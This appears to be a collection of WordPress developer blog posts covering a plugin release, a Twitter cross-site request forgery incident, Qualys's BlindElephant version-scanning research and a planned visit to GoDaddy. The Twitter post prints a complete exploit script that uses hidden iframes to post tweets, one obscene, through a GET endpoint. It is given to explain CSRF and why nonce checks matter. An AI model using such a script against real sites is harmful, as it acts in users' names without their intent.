I just released a new plugin, Filtered HTML for Editors.
This is in response to a published report suggesting there is a vulnerability in WordPress 3.0.4. The report is invalid, but I’m offering this plugin for sites that do not trust users given the Editor role.
For more information, please read my blog post on the WordPress Development Updates blog, and read the plugin’s description and FAQ.
I mean, who didn’t see this coming?
Twitter allows a URL to send a tweet. Many sites and retweet buttons and such rely on it. No POST, no nonce, nothing. Just a simple HTTP GET triggers a tweet. Clearly, someone was going to exploit this eventually.
Authentication is not the same as intention. You can’t just determine that a user is allowed to do something, but also that they intended to do something. When intent is not established, and especially when the form can be submitted via a GET request, it makes these kinds of exploits child’s play, as you can see by the complete exploit code below. It’s called a cross-site request forgery, or CSRF (or XSRF).
How do you determine intention? You’ll want to avoid accepting information over GET, but really that does nothing. Next step would be to check the HTTP referrer, but those can be spoofed. Since that isn’t foolproof, then you need to use something like a nonce check, like what we use in WordPress. For Twitter to secure the site from a CSRF vulnerability, they’ll be breaking a lot of embedded tools and buttons on many, many sites, so for now, they’ve apparently disabled the share endpoint that was exploited.
For the WordPress developers out there, probably the best read out there is this post by Mark Jaquith, from four years ago. It still applies as if it was written yesterday. For the non-WordPress developers, it’s still a great read as it explains what’s really going on, how WordPress prevents it, and why intention is important (if that isn’t obvious enough).
Once again, Twitter users are victims, thanks to the lack of basic security practices.
Update: Check out TechCrunch’s coverage. They quote a certain commenter who explained the issue. 
Here’s the exploit:
<script type="text/javascript">
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
Updates are easy. They should be easier. Check out our proposal at the end of this post.
This week at Black Hat conference in Las Vegas, security company Qualys presented and released BlindElephant, a utility that scans web sites for insecure web applications. Their research identified that 70 percent of sites running Drupal are affected by critical vulnerabilities, and that the statistics only get worse for Joomla (92%), MediaWiki (95%), phpBB (100%). 1
I received a press release about BlindElephant earlier this week. At the time, I didn’t think much of it. It surely would have gotten my attention, however, had it included their WordPress statistic — 4 percent. (What did catch my attention was this IDG article.)
The application, the source for which Qualys released, isn’t about identifying critical vulnerabilities; it’s about identifying the versions of software that websites run. They made their own determinations which versions had “critical vulnerabilities.” 2 Check out their slides and white paper, both packed with great information and statistics.
For WordPress, they cited version 2.5.1 as the earliest release outside the critical barrier, which fixed an important security flaw in our secret key implementation.
In case you didn’t already know, that 2.5.1 is not secure. We’ve made countless incremental improvements to the security of WordPress in the four major versions and many maintenance and security releases over last two years.
Alas, WordPress has a security perception issue. It’s widely used and widely targeted. Plugins have extended it every which way. Of course, “My WordPress was hacked!!!!111″ doesn’t mean that WP is the attack vector. It very rarely is.
But at the same time, WordPress is easy to use and easy to upgrade. Among major open source web applications, it quite possibly leads in both categories, and its developers and contributors have worked hard to make it that way.
That brings me back to BlindElephant. Their white paper says they checked more than 25,000 WordPress installs and found the vast majority of them to be running WordPress 2.9 or higher. Qualys cited the “application’s easy, reliable updating design” as why we have such a clear advantage. I’m down with that.
This post’s title comes from the 3.0.1 haiku. If you’re not running 3.0.1, please update. It’s easy, usually always painless, and will provide you (and me) peace of mind. But we do have goals to make it even easier. With that, I leave you with one such proposal, from Daryl Koopersmith (@darylkoop) and me: If you fall behind on your updates, we’re thinking a modal dialog box with a twist. What do you think? 3
Notes:
WordPress has been mentioned a lot lately. Is this application specifically vulnerable?
No. WordPress is a high-quality project that updates their software whenever a security problem is found. The latest versions do not contain any vulnerabilities that we are aware of. If you are running an old version, please update yourself. This is a common practice and should be familiar to any Windows or Mac OS X desktop user.
This being said, due to the ubiquity as one of the world’s most popular open-source publishing systems, WordPress is often the target of the payload with code injections and backdoor entry points after the attackers have maliciously gained access to a user’s website. The fact that WordPress is frequently a payload target DOES NOT mean that WordPress itself is vulnerable. It just means it’s popular and very powerful. You should continue to use it and we think it’s great software.
I couldn’t have said it better myself. Thanks MediaTemple.
At the risk of this getting drowned out with everything else abuzz in the WordPress community:
On Thursday, I am visiting GoDaddy headquarters. Please post any questions you may have for them and I will see to it that I can get them answered.
Some background: GoDaddy hosts a few hundred thousand WordPress sites, many through a special package. They have been bitten by the same attacks affecting other hosting companies. I previously mentioned GoDaddy when compiling my thoughts on WordPress security and the shared hosting attacks, and I didn’t mince words then.
What should I ask?